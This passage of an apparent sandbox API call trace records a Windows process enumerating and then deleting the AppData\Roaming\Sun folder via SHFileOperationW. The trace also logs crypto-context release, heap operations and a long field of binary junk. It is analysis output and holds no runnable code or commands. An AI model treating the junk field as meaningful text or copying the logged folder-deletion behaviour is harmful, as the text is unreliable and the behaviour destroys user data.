wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.255] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0151.255] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.255] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.255] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0151.255] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.255] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0151.255] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.256] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.256] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.256] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.256] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0151.256] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0151.256] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0151.256] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0151.256] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0151.256] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.256] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.256] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0151.256] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.256] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0151.256] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0151.256] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0151.256] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0151.256] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0151.256] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0151.256] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0151.258] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0151.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f71e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0151.259] CryptReleaseContext (hProv=0x9bf440, dwFlags=0x0) returned 1 [0151.259] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.259] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.259] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0151.259] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.259] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0151.259] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0151.259] FreeLibrary (hLibModule=0x76390000) returned 1 [0151.259] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.259] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.259] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.259] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.259] CloseHandle (hObject=0x4b0) returned 1 [0151.260] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.260] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0151.260] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0151.260] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0151.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0151.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0151.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0151.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0151.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0151.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0151.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0151.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0151.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0151.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0151.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0151.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0151.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0151.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0151.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0151.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0151.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0151.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0151.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0151.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0151.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0151.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0151.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0151.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0151.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0151.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0151.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x48) returned 0x2a5db10 [0151.261] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Sun", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun", lpFilePart=0x8cedf4*="Sun") returned 0x23 [0151.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5db10 | out: hHeap=0x2af0000) returned 1 [0151.261] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\sun")) returned 0x10 [0151.261] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xad2cc5cd, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e1b38 [0151.262] FindNextFileW (in: hFindFile=0x9e1b38, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xad2cc5cd, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0151.262] FindNextFileW (in: hFindFile=0x9e1b38, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xad2cc5cd, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Java", cAlternateFileName="")) returned 1 [0151.262] FindNextFileW (in: hFindFile=0x9e1b38, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xad2cc5cd, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Java", cAlternateFileName="")) returned 0 [0151.262] FindClose (in: hFindFile=0x9e1b38 | out: hFindFile=0x9e1b38) returned 1 [0151.262] GetLastError () returned 0x12 [0151.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0151.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0151.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0151.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0151.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0151.262] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0151.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0151.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0151.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0151.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0151.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0151.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0151.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0151.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0151.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0151.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0151.262] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0151.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0151.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0151.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0151.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0151.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0151.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9040 [0151.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0151.263] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0151.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0151.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0151.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0151.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0151.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0151.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0151.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0151.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0151.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0151.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0151.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0151.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0151.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0151.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0151.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0151.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0151.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0151.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0151.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0151.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0151.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0151.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0151.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0151.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0151.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0151.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0151.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0151.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0151.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0151.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0151.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0151.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0151.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0151.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0151.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0151.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0151.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x48) returned 0x2a5d660 [0151.266] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Sun", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun", lpFilePart=0x8cf650*="Sun") returned 0x23 [0151.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d660 | out: hHeap=0x2af0000) returned 1 [0151.266] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\sun")) returned 0x10 [0151.266] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍